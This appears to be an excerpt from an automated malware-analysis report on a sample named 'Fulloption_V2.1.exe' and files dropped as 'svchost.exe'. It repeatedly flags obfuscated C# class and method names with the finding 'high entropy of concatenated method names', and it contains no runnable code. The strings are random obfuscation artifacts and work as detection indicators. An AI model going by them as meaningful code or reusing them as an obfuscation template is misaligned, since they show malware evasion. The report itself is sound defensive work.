Source: svchost.exe.0.dr, mwrQFcRkt38gC1V5xNqClLYt3hU6PBDmWtPNwgdnjJxNwRqVITbV0j9tBhXXeUo6OrvPn8XjWJhcmMtRZLdI8aZSthzJL.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_41DVHCHdjNjbSymvUA811Mu6GOGmw6I', '_3b0M4lkDBK0G57gZKI5mkapNSeXoDow', 'orJjXw10OSLgmbgN7TcjjJYBL2KxYST', 'ywX6wxXVWRmCnUHN8JWJ7p8iOUQQIst'
Source: svchost.exe.0.dr, ksVOLHYH2txrD1f6ZGsKecdyfCOq3zVBvKZG.cs	High entropy of concatenated method names: 'oIPsJaB8XlkzabBMzgv4On2y0sKXKhIyCuiM', 'Q9ACwG9UvNoHaZuGESGacA1IuTfQpLdmMuw7', '_6iwntAMKD7CDTKUHnirMFpQLYUfqKwou1CDV', 'VOgpGbULgv102EpX4TvA7HzfJ5jSdOHjj8rJ', 'ggw1UNGjFtZAfjCjGRXRLlyI4IrxvUQRSxfA', '_737T5sTr0U5DmDxgXVd15DEctWP4V8uYaNP4', 'W6W3YaFOa0rOLlQdSMmfFxxSCCMov9FCbY7y', '_2og22vWbcGmUERr9elI0A4vZ2eJn9rryc0k6', '_121I85bmxg5hviaYXiTqawofSR15m8oXojN1', 'BZIbxmgfFERXav8ZFFXXQyUtNFAOTS5spx69'
Source: svchost.exe.0.dr, uP2b6O9KTPI4vnSI1dUR307wFVvyBMXKBkdiV3aZulCaIXtlxiT7MJP0PcYVqnbWEh1PpVH.cs	High entropy of concatenated method names: '_4whaG0NfKPgd4ZkMPVa3sLuuwMGAph72tU6zI98PGqCJTdmymoQcTnZTf7uN8dzPnKVaqOB', 'cqtQEUcKPRtCO0l3Z5D6iaCC07cz2j4TjhKqZFQd0jwPR6iksDjDyoLIHUXyVuU91PjKzGg', 'nEZIUUNa036X5AaNVDQ2ozCTqpobwqZBcDBhFiSps3BJLkNIzO9Pg4t4Yu3QgyRYiNfNQvp', 'VGK8JmHpQfVdpmGXNP69EueY8OYk3BTbErbV8X5Csk5QjVtzDU7exK36kFDWMqIRJp9QRU2', 'jj4xD19z5GpuhgD95bM5GWbbDSgqdv4GX5V0sD7P', 'uToy5TZO8ZswGteckj5ExX1O8MYhrSeG90gzz5Zn', 'hW5Qy1eLqYfN6p36MB0aPR73GuN5utyOdI2g0b1g', 'bvRYn6cDQsOaHDhNaYay3JXpX1PklhA1r6ovypM6', '_0Pvz8TeM8TOWTtLf3KI7iZGkSEUCGzFtz0X1OkPc', 'JnH4Y6npZxaMxVJmRRKJN8grWyPSGJ3ZZjqQLxVJ'
Source: svchost.exe.0.dr, QrEb9vEQK30TbzqrpPRS8gMxn9hcElerDl9JLkmyiIwgNpEMK2Koy.cs	High entropy of concatenated method names: 'nJ4pCkj81LCk8n9M8r0MuxIGdnZGl3UhEuz8KZazncDp52HQaHWaq', '_1WsMSTZltwhQ8Ljacv3qEnOxQyuZeLWnd9NghzytYRpDQebm5DCGJ', 'uWgWaB5JuiKDElvIH7DNHJAAjQfKtbbUVmMEA1FG6Ryv0EJL710ly', 'fDjOZD38dKxo9Qvg7Li01H0SaYYrlzAv4RczkgRf2FPDW0bP7MMLt', 'oqk4bCr5n4TPUhNHgAnAi19CtOzg9s5wT8wjOSoLYIJA6asLGz58A', 'fYft3dOnodl407XwgHbSuPsc0WF1m6PPk55FsMLiDDWwX10Vqenrm', 'EdRAkl5K2RTyRBJoBy8pC3XY3WVME84TvI7tXIlxdZpehprJkJ9oo', 'uribgpzGSIR1DWzCkWHN7sCiCbFioagrPLh5CjzaeGHWDOwTJFxw8', '_7Uvq2gvbpbOWQpewNW9TtAztXgGrGZ1Zkw3iHpJ0PEa7P67Zmr6R31hg7ZZDaJoNrXQLwkz3OybcHWg4FsSDOk', 'WJqvSELw67r8XXRJVpiS7TGH4nGN2gQ5b4aRlNM7d1VQxmVIrHJEelvBaciD9o8O5yHs5rOyFIZh2ek7o04NO7'
Source: svchost.exe.0.dr, HHjXEnOXMpZZX0t333rKZzttX3c0bCGrLWdWm8VpSuXC8NLbGmkV7.cs	High entropy of concatenated method names: 'Pn7KfKAyyOMB9Pxh2oUTavMs2mIlIVjOPRO2lVPNTdUKCqsrCu7Rw', '_0Wy8cULXkdC7gFDLqOEkoWZ', 'R0CPTb6Nt5KR1uU9gJU7bge', 'SIz1A0AO4szxhhh7r93Ktkc', '_1EVdRepVsmQc8aXYbNxJhsV'
Source: svchost.exe.0.dr, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.cs	High entropy of concatenated method names: 'QLoIK6MQKZjSrX4c4Urrk8j1IJEZkRJzsaV5odMpkpsqnbGzoeibxctIRypNw3WG32idsDM', 'cTyY8LYhw8rJauQzbgRcncL1IAju3piSg7DsEzD7', 'sP0vEm0wuY3OgW7khbkQW6wsh50oo3Y3XCLYw5q4', 'blhGtCwY9J06zKYhJgaHA2I3GxJvOjIo5RXdBpEO', '_8JVR6RNsuQwmXdHgGw2fiXKBvlad0tKb2cFvJ1mz'
Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs	High entropy of concatenated method names: 'xoboGU6a1ItakvDvtzSPS', 'EhVpMT8GhwZpb01mGHvMU', '_0GifaBSmFVIn1n9GU4E0Y', '_0kDl49Cffw8kYkSs81KAV', 'OdrlfifM3gg31HIjeUXPp', 'R36sh6plTKMWM2lS0LJ6Y', 'PisVAydldAR5GNtCSQxnH', '_3QvDovLndaksT3UJQM35x', '_8EH1qNwMzZa7aGmGOc83k', '_1fpLGU6RLRAN4gi7eSHVa'
Source: svchost.exe.0.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	High entropy of concatenated method names: 'VV1389fJAaw2xMLnzXDcLkTAWCYNTgGHa259', 'nllw1xMJI3tMcAbD2LMS7730GRBaKGc90xBh', 'ACFjARoWtcWCQ0pfVq4tkjPYbQiDXhY9aka2', 'LbzLCXyTfe7RmnKbSxX8GlKEyxcxAgdzQMur', 'VqjCXC6Je77iK61L90x5KUxjEnHkN8FKROzn', 'ukH5jJIaius70tje6nPoxgEz7ZfihLxNHIPz', 'eYGnoOsvEp9cK5llPRmQ3p7bpwwORYtXPjmk', 'j1NM555wUAdu9y59lVk5q94CntDdRNIxcx6E', 'TTO8yrgrAvaj8dGKwmb3H94DfPJhGoT92zah', 'Da3MybxiBo2Ybz1f3SlfIBtNgb6f6xAe99d5'
Source: svchost.exe.0.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	High entropy of concatenated method names: 'TMzGgVgQoxXYCRFfkMTai490uZGlUHLySUqT7Z2gQ0KnfedSjkB5yLmxCAnTaFn65mbTciy', 'uy94aOUEW6mC9', 'RgUy88j1EMNau', '_0MWOCNlw01UKe', 'y5wKvQZTM4bGH', 'Ub497o83BvnK5', 'NXfPr1Yvwda78', 'ryAb5ogeWmK1p', 'Yy4aahsIgvIB1', 'iwKahv22KUBQj'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, epshUjPPFi8VAukWaTuS6SgPmPHhoxaSEk0RkjN7LYEiZkZLfM8XgYvqprlPD2I4acyXu2wsNSVFFzmTz0D8SL0A.cs	High entropy of concatenated method names: 'lLlozhn22xlByUn733fdwBdhLMxxLGDU3yanVulQvTYnjik1GRJ7ddmG2WNhEbgulpVURp9dM8OYozff7A1ScMEe', 'RFLWhqlB4KP4usbHtAhcFrt7M2SSzXSJ5WRDwp29EUAwOdSQlY1UKdvKOKhyvS21GH2cUQh4cSPht7WrBxrn0pRU', '_1vYZFEIcFnzwLBg1OX5thISvJlmznuv', 'nCneH4pLXzIeclOmQvEQMJB7BnApoImKgRx1dhJaFbFBSQt2xBvQJ5CPB9', 'BOTP9EOLEYvGi2ghNdyqOyGVsBWN1o7fEgaUam7bLWFGszL9D8FNdrJjDe', '_69qbXEv5idF2syalvaJXZi5AaXaM3QQxdEhhVl40XOsJtTPNXfHejc8IIa', 'yJtdWi5MAxvaMnSHZoWYsZgzCjPAee7r3ATSL2PvJCeXvjzv3Ecudd2ZuN', '_9fOKoWoFegi8YVdh0pvC8jnvv1Sr6v48w9NMW8fHJRvzlSXu9TR8EvuwPk', 'jR0bU97EzqUKmO6fpzyHCAuv7wntaxMMDQw64KlxkfoFja4R13skbGJUS3', 'E7DQO66sDqRGGq9Ru7eAJ0tTp0T7yOxkXzo0cPX2jbzTOh2k80Af8Lvtwn'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.cs	High entropy of concatenated method names: 'fkNZMK99FovrpzCSQil6vfrfaJ7gik3', 'xKm7QDoGTWTe3GiIsGCTkO2PudjrwCW', 'tIk6KXWJhXgWRXmdx11z59eQP2Gyx2U', 'booBJ8dQVHmf7b9XsC8UT44ngHrTkRb'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, mwrQFcRkt38gC1V5xNqClLYt3hU6PBDmWtPNwgdnjJxNwRqVITbV0j9tBhXXeUo6OrvPn8XjWJhcmMtRZLdI8aZSthzJL.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_41DVHCHdjNjbSymvUA811Mu6GOGmw6I', '_3b0M4lkDBK0G57gZKI5mkapNSeXoDow', 'orJjXw10OSLgmbgN7TcjjJYBL2KxYST', 'ywX6wxXVWRmCnUHN8JWJ7p8iOUQQIst'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, ksVOLHYH2txrD1f6ZGsKecdyfCOq3zVBvKZG.cs	High entropy of concatenated method names: 'oIPsJaB8XlkzabBMzgv4On2y0sKXKhIyCuiM', 'Q9ACwG9UvNoHaZuGESGacA1IuTfQpLdmMuw7', '_6iwntAMKD7CDTKUHnirMFpQLYUfqKwou1CDV', 'VOgpGbULgv102EpX4TvA7HzfJ5jSdOHjj8rJ', 'ggw1UNGjFtZAfjCjGRXRLlyI4IrxvUQRSxfA', '_737T5sTr0U5DmDxgXVd15DEctWP4V8uYaNP4', 'W6W3YaFOa0rOLlQdSMmfFxxSCCMov9FCbY7y', '_2og22vWbcGmUERr9elI0A4vZ2eJn9rryc0k6', '_121I85bmxg5hviaYXiTqawofSR15m8oXojN1', 'BZIbxmgfFERXav8ZFFXXQyUtNFAOTS5spx69'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, uP2b6O9KTPI4vnSI1dUR307wFVvyBMXKBkdiV3aZulCaIXtlxiT7MJP0PcYVqnbWEh1PpVH.cs	High entropy of concatenated method names: '_4whaG0NfKPgd4ZkMPVa3sLuuwMGAph72tU6zI98PGqCJTdmymoQcTnZTf7uN8dzPnKVaqOB', 'cqtQEUcKPRtCO0l3Z5D6iaCC07cz2j4TjhKqZFQd0jwPR6iksDjDyoLIHUXyVuU91PjKzGg', 'nEZIUUNa036X5AaNVDQ2ozCTqpobwqZBcDBhFiSps3BJLkNIzO9Pg4t4Yu3QgyRYiNfNQvp', 'VGK8JmHpQfVdpmGXNP69EueY8OYk3BTbErbV8X5Csk5QjVtzDU7exK36kFDWMqIRJp9QRU2', 'jj4xD19z5GpuhgD95bM5GWbbDSgqdv4GX5V0sD7P', 'uToy5TZO8ZswGteckj5ExX1O8MYhrSeG90gzz5Zn', 'hW5Qy1eLqYfN6p36MB0aPR73GuN5utyOdI2g0b1g', 'bvRYn6cDQsOaHDhNaYay3JXpX1PklhA1r6ovypM6', '_0Pvz8TeM8TOWTtLf3KI7iZGkSEUCGzFtz0X1OkPc', 'JnH4Y6npZxaMxVJmRRKJN8grWyPSGJ3ZZjqQLxVJ'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, QrEb9vEQK30TbzqrpPRS8gMxn9hcElerDl9JLkmyiIwgNpEMK2Koy.cs	High entropy of concatenated method names: 'nJ4pCkj81LCk8n9M8r0MuxIGdnZGl3UhEuz8KZazncDp52HQaHWaq', '_1WsMSTZltwhQ8Ljacv3qEnOxQyuZeLWnd9NghzytYRpDQebm5DCGJ', 'uWgWaB5JuiKDElvIH7DNHJAAjQfKtbbUVmMEA1FG6Ryv0EJL710ly', 'fDjOZD38dKxo9Qvg7Li01H0SaYYrlzAv4RczkgRf2FPDW0bP7MMLt', 'oqk4bCr5n4TPUhNHgAnAi19CtOzg9s5wT8wjOSoLYIJA6asLGz58A', 'fYft3dOnodl407XwgHbSuPsc0WF1m6PPk55FsMLiDDWwX10Vqenrm', 'EdRAkl5K2RTyRBJoBy8pC3XY3WVME84TvI7tXIlxdZpehprJkJ9oo', 'uribgpzGSIR1DWzCkWHN7sCiCbFioagrPLh5CjzaeGHWDOwTJFxw8', '_7Uvq2gvbpbOWQpewNW9TtAztXgGrGZ1Zkw3iHpJ0PEa7P67Zmr6R31hg7ZZDaJoNrXQLwkz3OybcHWg4FsSDOk', 'WJqvSELw67r8XXRJVpiS7TGH4nGN2gQ5b4aRlNM7d1VQxmVIrHJEelvBaciD9o8O5yHs5rOyFIZh2ek7o04NO7'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, HHjXEnOXMpZZX0t333rKZzttX3c0bCGrLWdWm8VpSuXC8NLbGmkV7.cs	High entropy of concatenated method names: 'Pn7KfKAyyOMB9Pxh2oUTavMs2mIlIVjOPRO2lVPNTdUKCqsrCu7Rw', '_0Wy8cULXkdC7gFDLqOEkoWZ', 'R0CPTb6Nt5KR1uU9gJU7bge', 'SIz1A0AO4szxhhh7r93Ktkc', '_1EVdRepVsmQc8aXYbNxJhsV'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.cs	High entropy of concatenated method names: 'QLoIK6MQKZjSrX4c4Urrk8j1IJEZkRJzsaV5odMpkpsqnbGzoeibxctIRypNw3WG32idsDM', 'cTyY8LYhw8rJauQzbgRcncL1IAju3piSg7DsEzD7', 'sP0vEm0wuY3OgW7khbkQW6wsh50oo3Y3XCLYw5q4', 'blhGtCwY9J06zKYhJgaHA2I3GxJvOjIo5RXdBpEO', '_8JVR6RNsuQwmXdHgGw2fiXKBvlad0tKb2cFvJ1mz'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	High entropy of concatenated method names: 'xoboGU6a1ItakvDvtzSPS', 'EhVpMT8GhwZpb01mGHvMU', '_0GifaBSmFVIn1n9GU4E0Y', '_0kDl49Cffw8kYkSs81KAV', 'OdrlfifM3gg31HIjeUXPp', 'R36sh6plTKMWM2lS0LJ6Y', 'PisVAydldAR5GNtCSQxnH', '_3QvDovLndaksT3UJQM35x', '_8EH1qNwMzZa7aGmGOc83k', '_1fpLGU6RLRAN4gi7eSHVa'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	High entropy of concatenated method names: 'VV1389fJAaw2xMLnzXDcLkTAWCYNTgGHa259', 'nllw1xMJI3tMcAbD2LMS7730GRBaKGc90xBh', 'ACFjARoWtcWCQ0pfVq4tkjPYbQiDXhY9aka2', 'LbzLCXyTfe7RmnKbSxX8GlKEyxcxAgdzQMur', 'VqjCXC6Je77iK61L90x5KUxjEnHkN8FKROzn', 'ukH5jJIaius70tje6nPoxgEz7ZfihLxNHIPz', 'eYGnoOsvEp9cK5llPRmQ3p7bpwwORYtXPjmk', 'j1NM555wUAdu9y59lVk5q94CntDdRNIxcx6E', 'TTO8yrgrAvaj8dGKwmb3H94DfPJhGoT92zah', 'Da3MybxiBo2Ybz1f3SlfIBtNgb6f6xAe99d5'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	High entropy of concatenated method names: 'TMzGgVgQoxXYCRFfkMTai490uZGlUHLySUqT7Z2gQ0KnfedSjkB5yLmxCAnTaFn65mbTciy', 'uy94aOUEW6mC9', 'RgUy88j1EMNau', '_0MWOCNlw01UKe', 'y5wKvQZTM4bGH', 'Ub497o83BvnK5', 'NXfPr1Yvwda78', 'ryAb5ogeWmK1p', 'Yy4aahsIgvIB1', 'iwKahv22KUBQj'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, epshUjPPFi8VAukWaTuS6SgPmPHhoxaSEk0RkjN7LYEiZkZLfM8XgYvqprlPD2I4acyXu2wsNSVFFzmTz0D8SL0A.cs	High entropy of concatenated method names: 'lLlozhn22xlByUn733fdwBdhLMxxLGDU3yanVulQvTYnjik1GRJ7ddmG2WNhEbgulpVURp9dM8OYozff7A1ScMEe', 'RFLWhqlB4KP4usbHtAhcFrt7M2SSzXSJ5WRDwp29EUAwOdSQlY1UKdvKOKhyvS21GH2cUQh4cSPht7WrBxrn0pRU', '_1vYZFEIcFnzwLBg1OX5thISvJlmznuv', 'nCneH4pLXzIeclOmQvEQMJB7BnApoImKgRx1dhJaFbFBSQt2xBvQJ5CPB9', 'BOTP9EOLEYvGi2ghNdyqOyGVsBWN1o7fEgaUam7bLWFGszL9D8FNdrJjDe', '_69qbXEv5idF2syalvaJXZi5AaXaM3QQxdEhhVl40XOsJtTPNXfHejc8IIa', 'yJtdWi5MAxvaMnSHZoWYsZgzCjPAee7r3ATSL2PvJCeXvjzv3Ecudd2ZuN', '_9fOKoWoFegi8YVdh0pvC8jnvv1Sr6v48w9NMW8fHJRvzlSXu9TR8EvuwPk', 'jR0bU97EzqUKmO6fpzyHCAuv7wntaxMMDQw64KlxkfoFja4R13skbGJUS3', 'E7DQO66sDqRGGq9Ru7eAJ0tTp0T7yOxkXzo0cPX2jbzTOh2k80Af8Lvtwn'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.cs	High entropy of concatenated method names: 'fkNZMK99FovrpzCSQil6vfrfaJ7gik3', 'xKm7QDoGTWTe3GiIsGCTkO2PudjrwCW', 'tIk6KXWJhXgWRXmdx11z59eQP2Gyx2U', 'booBJ8dQVHmf7b9XsC8UT44ngHrTkRb'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, mwrQFcRkt38gC1V5xNqClLYt3hU6PBDmWtPNwgdnjJxNwRqVITbV0j9tBhXXeUo6OrvPn8XjWJhcmMtRZLdI8aZSthzJL.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_41DVHCHdjNjbSymvUA811Mu6GOGmw6I', '_3b0M4lkDBK0G57gZKI5mkapNSeXoDow', 'orJjXw10OSLgmbgN7TcjjJYBL2KxYST', 'ywX6wxXVWRmCnUHN8JWJ7p8iOUQQIst'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, ksVOLHYH2txrD1f6ZGsKecdyfCOq3zVBvKZG.cs	High entropy of concatenated method names: 'oIPsJaB8XlkzabBMzgv4On2y0sKXKhIyCuiM', 'Q9ACwG9UvNoHaZuGESGacA1IuTfQpLdmMuw7', '_6iwntAMKD7CDTKUHnirMFpQLYUfqKwou1CDV', 'VOgpGbULgv102EpX4TvA7HzfJ5jSdOHjj8rJ', 'ggw1UNGjFtZAfjCjGRXRLlyI4IrxvUQRSxfA', '_737T5sTr0U5DmDxgXVd15DEctWP4V8uYaNP4', 'W6W3YaFOa0rOLlQdSMmfFxxSCCMov9FCbY7y', '_2og22vWbcGmUERr9elI0A4vZ2eJn9rryc0k6', '_121I85bmxg5hviaYXiTqawofSR15m8oXojN1', 'BZIbxmgfFERXav8ZFFXXQyUtNFAOTS5spx69'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, uP2b6O9KTPI4vnSI1dUR307wFVvyBMXKBkdiV3aZulCaIXtlxiT7MJP0PcYVqnbWEh1PpVH.cs	High entropy of concatenated method names: '_4whaG0NfKPgd4ZkMPVa3sLuuwMGAph72tU6zI98PGqCJTdmymoQcTnZTf7uN8dzPnKVaqOB', 'cqtQEUcKPRtCO0l3Z5D6iaCC07cz2j4TjhKqZFQd0jwPR6iksDjDyoLIHUXyVuU91PjKzGg', 'nEZIUUNa036X5AaNVDQ2ozCTqpobwqZBcDBhFiSps3BJLkNIzO9Pg4t4Yu3QgyRYiNfNQvp', 'VGK8JmHpQfVdpmGXNP69EueY8OYk3BTbErbV8X5Csk5QjVtzDU7exK36kFDWMqIRJp9QRU2', 'jj4xD19z5GpuhgD95bM5GWbbDSgqdv4GX5V0sD7P', 'uToy5TZO8ZswGteckj5ExX1O8MYhrSeG90gzz5Zn', 'hW5Qy1eLqYfN6p36MB0aPR73GuN5utyOdI2g0b1g', 'bvRYn6cDQsOaHDhNaYay3JXpX1PklhA1r6ovypM6', '_0Pvz8TeM8TOWTtLf3KI7iZGkSEUCGzFtz0X1OkPc', 'JnH4Y6npZxaMxVJmRRKJN8grWyPSGJ3ZZjqQLxVJ'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, QrEb9vEQK30TbzqrpPRS8gMxn9hcElerDl9JLkmyiIwgNpEMK2Koy.cs	High entropy of concatenated method names: 'nJ4pCkj81LCk8n9M8r0MuxIGdnZGl3UhEuz8KZazncDp52HQaHWaq', '_1WsMSTZltwhQ8Ljacv3qEnOxQyuZeLWnd9NghzytYRpDQebm5DCGJ', 'uWgWaB5JuiKDElvIH7DNHJAAjQfKtbbUVmMEA1FG6Ryv0EJL710ly', 'fDjOZD38dKxo9Qvg7Li01H0SaYYrlzAv4RczkgRf2FPDW0bP7MMLt', 'oqk4bCr5n4TPUhNHgAnAi19CtOzg9s5wT8wjOSoLYIJA6asLGz58A', 'fYft3dOnodl407XwgHbSuPsc0WF1m6PPk55FsMLiDDWwX10Vqenrm', 'EdRAkl5K2RTyRBJoBy8pC3XY3WVME84TvI7tXIlxdZpehprJkJ9oo', 'uribgpzGSIR1DWzCkWHN7sCiCbFioagrPLh5CjzaeGHWDOwTJFxw8', '_7Uvq2gvbpbOWQpewNW9TtAztXgGrGZ1Zkw3iHpJ0PEa7P67Zmr6R31hg7ZZDaJoNrXQLwkz3OybcHWg4FsSDOk', 'WJqvSELw67r8XXRJVpiS7TGH4nGN2gQ5b4aRlNM7d1VQxmVIrHJEelvBaciD9o8O5yHs5rOyFIZh2ek7o04NO7'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, HHjXEnOXMpZZX0t333rKZzttX3c0bCGrLWdWm8VpSuXC8NLbGmkV7.cs	High entropy of concatenated method names: 'Pn7KfKAyyOMB9Pxh2oUTavMs2mIlIVjOPRO2lVPNTdUKCqsrCu7Rw', '_0Wy8cULXkdC7gFDLqOEkoWZ', 'R0CPTb6Nt5KR1uU9gJU7bge', 'SIz1A0AO4szxhhh7r93Ktkc', '_1EVdRepVsmQc8aXYbNxJhsV'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.cs	High entropy of concatenated method names: 'QLoIK6MQKZjSrX4c4Urrk8j1IJEZkRJzsaV5odMpkpsqnbGzoeibxctIRypNw3WG32idsDM', 'cTyY8LYhw8rJauQzbgRcncL1IAju3piSg7DsEzD7', 'sP0vEm0wuY3OgW7khbkQW6wsh50oo3Y3XCLYw5q4', 'blhGtCwY9J06zKYhJgaHA2I3GxJvOjIo5RXdBpEO', '_8JVR6RNsuQwmXdHgGw2fiXKBvlad0tKb2cFvJ1mz'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs	High entropy of concatenated method names: 'xoboGU6a1ItakvDvtzSPS', 'EhVpMT8GhwZpb01mGHvMU', '_0GifaBSmFVIn1n9GU4E0Y', '_0kDl49Cffw8kYkSs81KAV', 'OdrlfifM3gg31HIjeUXPp', 'R36sh6plTKMWM2lS0LJ6Y', 'PisVAydldAR5GNtCSQxnH', '_3QvDovLndaksT3UJQM35x', '_8EH1qNwMzZa7aGmGOc83k', '_1fpLGU6RLRAN4gi7eSHVa'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	High entropy of concatenated method names: 'VV1389fJAaw2xMLnzXDcLkTAWCYNTgGHa259', 'nllw1xMJI3tMcAbD2LMS7730GRBaKGc90xBh', 'ACFjARoWtcWCQ0pfVq4tkjPYbQiDXhY9aka2', 'LbzLCXyTfe7RmnKbSxX8GlKEyxcxAgdzQMur', 'VqjCXC6Je77iK61L90x5KUxjEnHkN8FKROzn', 'ukH5jJIaius70tje6nPoxgEz7ZfihLxNHIPz', 'eYGnoOsvEp9cK5llPRmQ3p7bpwwORYtXPjmk', 'j1NM555wUAdu9y59lVk5q94CntDdRNIxcx6E', 'TTO8yrgrAvaj8dGKwmb3H94DfPJhGoT92zah', 'Da3MybxiBo2Ybz1f3SlfIBtNgb6f6xAe99d5'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	High entropy of concatenated method names: 'TMzGgVgQoxXYCRFfkMTai490uZGlUHLySUqT7Z2gQ0KnfedSjkB5yLmxCAnTaFn65mbTciy', 'uy94aOUEW6mC9', 'RgUy88j1EMNau', '_0MWOCNlw01UKe', 'y5wKvQZTM4bGH', 'Ub497o83BvnK5', 'NXfPr1Yvwda78', 'ryAb5ogeWmK1p', 'Yy4aahsIgvIB1', 'iwKahv22KUBQj'
Source: svchost.exe.3.dr, epshUjPPFi8VAukWaTuS6SgPmPHhoxaSEk0RkjN7LYEiZkZLfM8XgYvqprlPD2I4acyXu2wsNSVFFzmTz0D8SL0A.cs	High entropy of concatenated method names: 'lLlozhn22xlByUn733fdwBdhLMxxLGDU3yanVulQvTYnjik1GRJ7ddmG2WNhEbgulpVURp9dM8OYozff7A1ScMEe', 'RFLWhqlB4KP4usbHtAhcFrt7M2SSzXSJ5WRDwp29EUAwOdSQlY1UKdvKOKhyvS21GH2cUQh4cSPht7WrBxrn0pRU', '_1vYZFEIcFnzwLBg1OX5thISvJlmznuv', 'nCneH4pLXzIeclOmQvEQMJB7BnApoImKgRx1dhJaFbFBSQt2xBvQJ5CPB9', 'BOTP9EOLEYvGi2ghNdyqOyGVsBWN1o7fEgaUam7bLWFGszL9D8FNdrJjDe', '_69qbXEv5idF2syalvaJXZi5AaXaM3QQxdEhhVl40XOsJtTPNXfHejc8IIa', 'yJtdWi5MAxvaMnSHZoWYsZgzCjPAee7r3ATSL2PvJCeXvjzv3Ecudd2ZuN', '_9fOKoWoFegi8YVdh0pvC8jnvv1Sr6v48w9NMW8fHJRvzlSXu9TR8EvuwPk', 'jR0bU97EzqUKmO6fpzyHCAuv7wntaxMMDQw64KlxkfoFja4R13skbGJUS3', 'E7DQO66sDqRGGq9Ru7eAJ0tTp0T7yOxkXzo0cPX2jbzTOh2k80Af8Lvtwn'
Source: svchost.exe.3.dr, ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.cs	High entropy of concatenated method names: 'fkNZMK99FovrpzCSQil6vfrfaJ7gik3', 'xKm7QDoGTWTe3GiIsGCTkO2PudjrwCW', 'tIk6KXWJhXgWRXmdx11z59eQP2Gyx2U', 'booBJ8dQVHmf7b9XsC8UT44ngHrTkRb'
Source: svchost.exe.3.dr, mwrQFcRkt38gC1V5xNqClLYt3hU6PBDmWtPNwgdnjJxNwRqVITbV0j9tBhXXeUo6OrvPn8XjWJhcmMtRZLdI8aZSthzJL.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_41DVHCHdjNjbSymvUA811Mu6GOGmw6I', '_3b0M4lkDBK0G57gZKI5mkapNSeXoDow', 'orJjXw10OSLgmbgN7TcjjJYBL2KxYST', 'ywX6wxXVWRmCnUHN8JWJ7p8iOUQQIst'
Source: svchost.exe.3.dr, ksVOLHYH2txrD1f6ZGsKecdyfCOq3zVBvKZG.cs	High entropy of concatenated method names: 'oIPsJaB8XlkzabBMzgv4On2y0sKXKhIyCuiM', 'Q9ACwG9UvNoHaZuGESGacA1IuTfQpLdmMuw7', '_6iwntAMKD7CDTKUHnirMFpQLYUfqKwou1CDV', 'VOgpGbULgv102EpX4TvA7HzfJ5jSdOHjj8rJ', 'ggw1UNGjFtZAfjCjGRXRLlyI4IrxvUQRSxfA', '_737T5sTr0U5DmDxgXVd15DEctWP4V8uYaNP4', 'W6W3YaFOa0rOLlQdSMmfFxxSCCMov9FCbY7y', '_2og22vWbcGmUERr9elI0A4vZ2eJn9rryc0k6', '_121I85bmxg5hviaYXiTqawofSR15m8oXojN1', 'BZIbxmgfFERXav8ZFFXXQyUtNFAOTS5spx69'
